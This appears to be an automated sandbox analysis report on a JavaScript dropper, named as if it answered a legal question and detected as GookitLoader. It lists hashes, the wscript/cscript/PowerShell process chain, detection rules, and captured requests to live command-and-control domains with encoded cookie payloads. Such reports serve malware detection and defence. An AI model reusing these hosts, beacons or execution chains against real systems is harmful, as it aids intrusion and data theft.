Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
is it legal to kill a peacock in california 93889.js

Overview

General Information

Sample name:is it legal to kill a peacock in california 93889.js
Analysis ID:1500124
MD5:42ffe54cde30c6d3babb008f491597ad
SHA1:7bdbe6b90df3e48cadbd494f0d2ff24fc32b287d
SHA256:5bf0940ddb8bc56d5322f879b64c0565f66a3ed6bf4dbdadc3e5f01236e08e52
Infos:

Detection

GookitLoader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected GookitLoader
Loading BitLocker PowerShell Module
Potential evasive JS / VBS script found (domain check)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6664 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\is it legal to kill a peacock in california 93889.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 4724 cmdline: C:\Windows\system32\wscript.EXE BALANC~1.JS MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cscript.exe (PID: 6768 cmdline: "C:\Windows\System32\cscript.exe" "BALANC~1.JS" MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
      • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5952 cmdline: powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
  • wscript.exe (PID: 2072 cmdline: C:\Windows\system32\wscript.EXE BALANC~1.JS MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cscript.exe (PID: 1888 cmdline: "C:\Windows\System32\cscript.exe" "BALANC~1.JS" MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
      • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5796 cmdline: powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Other

SourceRuleDescriptionAuthorStrings
amsi64_6768.amsi.csvJoeSecurity_GookitLoaderYara detected GookitLoaderJoe Security
    amsi64_5952.amsi.csvJoeSecurity_GookitLoaderYara detected GookitLoaderJoe Security
      amsi64_1888.amsi.csvJoeSecurity_GookitLoaderYara detected GookitLoaderJoe Security
        amsi64_5796.amsi.csvJoeSecurity_GookitLoaderYara detected GookitLoaderJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\is it legal to kill a peacock in california 93889.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\is it legal to kill a peacock in california 93889.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\is it legal to kill a peacock in california 93889.js", ProcessId: 6664, ProcessName: wscript.exe
          Sigma detected: Use NTFS Short Name in Command Line
          Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\wscript.EXE BALANC~1.JS, CommandLine: C:\Windows\system32\wscript.EXE BALANC~1.JS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE BALANC~1.JS, ProcessId: 4724, ProcessName: wscript.exe
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\is it legal to kill a peacock in california 93889.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\is it legal to kill a peacock in california 93889.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\is it legal to kill a peacock in california 93889.js", ProcessId: 6664, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell, CommandLine: powershell, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cscript.exe" "BALANC~1.JS", ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 6768, ParentProcessName: cscript.exe, ProcessCommandLine: powershell, ProcessId: 5952, ProcessName: powershell.exe

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results
          Source: unknownHTTPS traffic detected: 109.237.132.6:443 -> 192.168.2.5:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 109.237.132.6:443 -> 192.168.2.5:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.67.130:443 -> 192.168.2.5:49717 version: TLS 1.2
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+RvUlNba+1u0lT5MPjNMAP8se+ZmZnXaXknenEYdxSF+AZWbLqRuvQDlkZjKdbxzAxlyB9wJiV7XhFWu9XgL2ErGBOHgkoqx6jWJrW2Xau2/qdv16bj/Tyqd2TzaqxHrLy3C2yLQSk612NIREwu2XFW987A3Vxdz7gfiydhBcgPoH3We1hcCx0LdkYxQV4IDwvizV0ZE5VSlkx0FQkir4eKPwBFoHNnIAcRPNzMLvVKYeOhA0BxKVYvHFC9DwVopRZC3H8R57MytZXFgi/UYOIi0OROMAsTUyjrPiLi+WticdhOfboopbyc/c348e2qR6rXUmC29GkNwVaTLkk36ACH3KvAQAA; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: www.shamara.deConnection: Close
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: www.shamara.deConnection: Close
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ipacrack.comConnection: Close
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ellinikiaktoploia.netConnection: Close
